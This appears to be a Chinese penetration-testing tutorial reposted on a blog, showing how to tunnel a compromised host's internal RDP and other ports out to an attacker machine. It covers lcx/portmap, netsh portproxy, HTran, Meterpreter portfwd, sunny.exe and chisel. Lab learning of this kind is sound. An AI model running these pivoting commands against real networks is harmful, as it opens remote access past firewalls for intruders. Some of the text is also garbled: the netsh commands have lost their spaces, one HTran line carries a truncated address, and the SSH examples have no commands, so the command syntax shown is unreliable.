大家好,欢迎来到IT知识分享网。
场景介绍
最近在真实环境测试和编写靶场实战教程时,总会遇到内网主机无法直接访问,需要通过转发端口、建立代理隧道等方式去访问,以方便后续进一步的横向渗透测试。本文章主要介绍一些端口转发工具的使用。
测试场景拓扑
正向连接和反向连接
学习端口转发之前,需要了解下什么事正向连接,什么是反向连接,如了解学习过,可以直接跳过本章节。
正向连接
反向连接
端口转发
端口转发,有时被称为做隧道,是安全壳( SSH)为网络安全通信使用的一种方法简单来说,端口转发就是将一个端口收到的流量转发到另一个端口。
SSH端口转发
例1:要将本地的8080端口转发到远程服务器的80端口,可以使用以下命令:
例2:要将远程服务器的8080端口转发到本地的80端口,可以使用以下命令:
LCX
LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制。
本章仅演示LCX
场景一
由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接是不可以的,就需要使用LCX进行端口转发
Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的53端口,这个时候攻击者在本地监听53端口并且转发到1111端口,这个时候攻击者连接自己的1111端口,等于访问web服务器的3389端口
在攻击机机器上执行命令,监听本地53端口并且转发到本地1111端口
lcx.exe -listen 53 1111
在靶机执行命令,将本地的3389端口转发到192.168.198.129的 53端口
lcx.exe -slave 192.168.198.129 53 127.0.0.1 3389
在攻击机器上运行远程桌面,地址为127.0.0.1:1111
场景二
lcx.exe -slave 192.168.0.114 54 127.0.0.1 3389
在vps运行lcx.exe -listen 54 1111,因为我的机器vps机器是kali系统所以使用的是portmap
./portmap -m 2 -p1 54 -p2 1111
在那内网攻击者机器上连接192.168.0.114:1111端口
netsh
使用windows自带的netsh配置规则也可达到和lcx一样的效果,但没有工具方便。建立转发规则:
netsh interfaceportproxyaddv4tov4listenport=6666 connect=3389connectaddress=192.168.1.2protocol=tcp
查看转发规则:
netsh interfaceportproxydump
删除转发规则:
netsh interfaceportproxydeletev4tov4listenport=7777
HTran
Htran.exe -tran 7777 127.0.0.1 3389
将本地端口转发到服务器端口
靶机:Htran.exe -slave 192.168.111.128 .0.0.1 3389 服务器:/portmap -m 2 -p1 6666 -p2 5555
转发内网端口
靶机:HTran.exe -tran 6666 192.168.1.2 3389 攻击机:rdesktop 192.168.111.132:6666
portfwd(msf自带)
前提:获取到MSF会话
meterpreter > portfwdadd-l 1234 -r 192.168.111.132-p 3389
CS插件
ngroc
在靶机上执行
sunny.exe clientid id
看到上图中 隧道启动成功的字样说明隧道启动成功了!
可以直接用kali连接转发后的端口了 域名+端口
rinetd
chisel
Chisel是一个快速TCP/UDP隧道,通过HTTP传输,通过SSH进行安全保护。单个可执行文件,包括客户端和服务器。Chisel主要用于通过防火墙,尽管它也可以用于为网络提供安全的端点。
工具下载:
https://github.com/jpillora/chisel
靶场转发本地的3000和8001端口 到10.10.14.64攻击机上。
攻击机: chisel.exe server --port 12345 靶场: chisel.exe client 10.10.14.64:12345 3000:127.0.0.1:3000 8001:127.0.0.1:8001
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://haidsoft.com/131523.html